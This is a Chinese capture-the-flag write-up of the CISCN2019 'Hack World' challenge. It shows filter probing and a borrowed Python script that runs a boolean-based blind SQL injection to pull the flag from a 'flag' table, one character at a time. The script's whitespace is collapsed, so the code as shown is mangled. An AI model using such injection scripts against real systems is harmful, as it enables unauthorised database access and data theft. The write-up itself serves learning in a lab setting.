当前位置: 首页 > news >正文

web:[CISCN2019 华北赛区 Day2 Web1]Hack World

题目

打开页面,页面提示为,想要的都在‘flag’表和‘flag’列里

随便输入一个数字看回显(1 2 3),发现回显不一样

输入1

输入2

输入3

输入4

输入单引号,显示bool(false)

尝试一下万能密码 1' or 1=1#

发现有过滤

这里使用了bp抓包,发现关键字都被过滤了

这里用异或算法进行绕过

采用大佬的脚本

importrequestss=requests.session()flag =''for iin range(1,50):for j in'-{abcdefghijklmnopqrstuvwxyz0123456789}':url="http://383826c2-f283-449b-9b7d-c64321040ddc.node4.buuoj.cn:81/index.php"sqls="if(ascii(substr((select(flag)from(flag)),{},1))=ascii('{}'),1,2)".format(i,j)data={"id":sqls}c = s.post(url,data=data,timeout=10)if 'Hello' in c.text:flag += jprint(flag)break

得到flag

参考文章链接:

[CISCN2019 华北赛区 Day2 Web1]Hack World-安全小天地

BUUCTF:[CISCN2019 华北赛区 Day2 Web1]Hack World_小小橘颂子的博客-CSDN博客

相关文章:

  • NUUO网络摄像头(NVR)RCE漏洞复现
  • CentOS 7 通过 yum 安装 MariaDB(Mysql)
  • 【入门Flink】- 03Flink部署
  • nodelist 与 HTMLCollection 的区别
  • 2024 Android Framework学习大纲之基础理论篇
  • Nginx服务器安装证书并启用SSL(acme.sh)
  • MySQL 表的增删查改(CRUD)
  • 基于级联延迟信号消除的锁相环(CDSC_PLL)技术MATLAB仿真
  • mediasoup udp端口分配策略
  • [笔记] 汉字判断
  • 学电脑编程零基础,计算机编程入门先学什么
  • Android startActivity流程
  • ruby语言怎么写个通用爬虫程序?
  • gcc -static 在centos stream8 和centos stream9中运行报错的解决办法
  • Linux中的进程等待
  • 【391天】每日项目总结系列128(2018.03.03)
  • 230. Kth Smallest Element in a BST
  • CEF与代理
  • Docker 笔记(1):介绍、镜像、容器及其基本操作
  • Git 使用集
  • hadoop集群管理系统搭建规划说明
  • IP路由与转发
  • JS+CSS实现数字滚动
  • Linux中的硬链接与软链接
  • Python中eval与exec的使用及区别
  • webpack项目中使用grunt监听文件变动自动打包编译
  • 两列自适应布局方案整理
  • 驱动程序原理
  • 如何用vue打造一个移动端音乐播放器
  • 消息队列系列二(IOT中消息队列的应用)
  • MPAndroidChart 教程:Y轴 YAxis
  • 数据可视化之下发图实践
  • ​油烟净化器电源安全,保障健康餐饮生活
  • (2)MFC+openGL单文档框架glFrame
  • (3)nginx 配置(nginx.conf)
  • (rabbitmq的高级特性)消息可靠性
  • (附源码)计算机毕业设计ssm电影分享网站
  • (万字长文)Spring的核心知识尽揽其中
  • (转)C语言家族扩展收藏 (转)C语言家族扩展
  • (转)scrum常见工具列表
  • .aanva
  • .NET 反射 Reflect
  • .NET国产化改造探索(三)、银河麒麟安装.NET 8环境
  • .NET中 MVC 工厂模式浅析
  • [2016.7 day.5] T2
  • [2019.3.5]BZOJ1934 [Shoi2007]Vote 善意的投票
  • [APUE]进程关系(下)
  • [BZOJ3757] 苹果树
  • [C#]使用DlibDotNet人脸检测人脸68特征点识别人脸5特征点识别人脸对齐人脸比对FaceMesh
  • [C++] Windows中字符串函数的种类
  • [hdu 3652] B-number
  • [HNCTF 2022 WEEK2]easy_include 文件包含遇上nginx
  • [javaSE] 数据结构(二叉查找树-插入节点)
  • [leetcode] Balanced Binary Tree
  • [LeetCode]-225. 用队列实现栈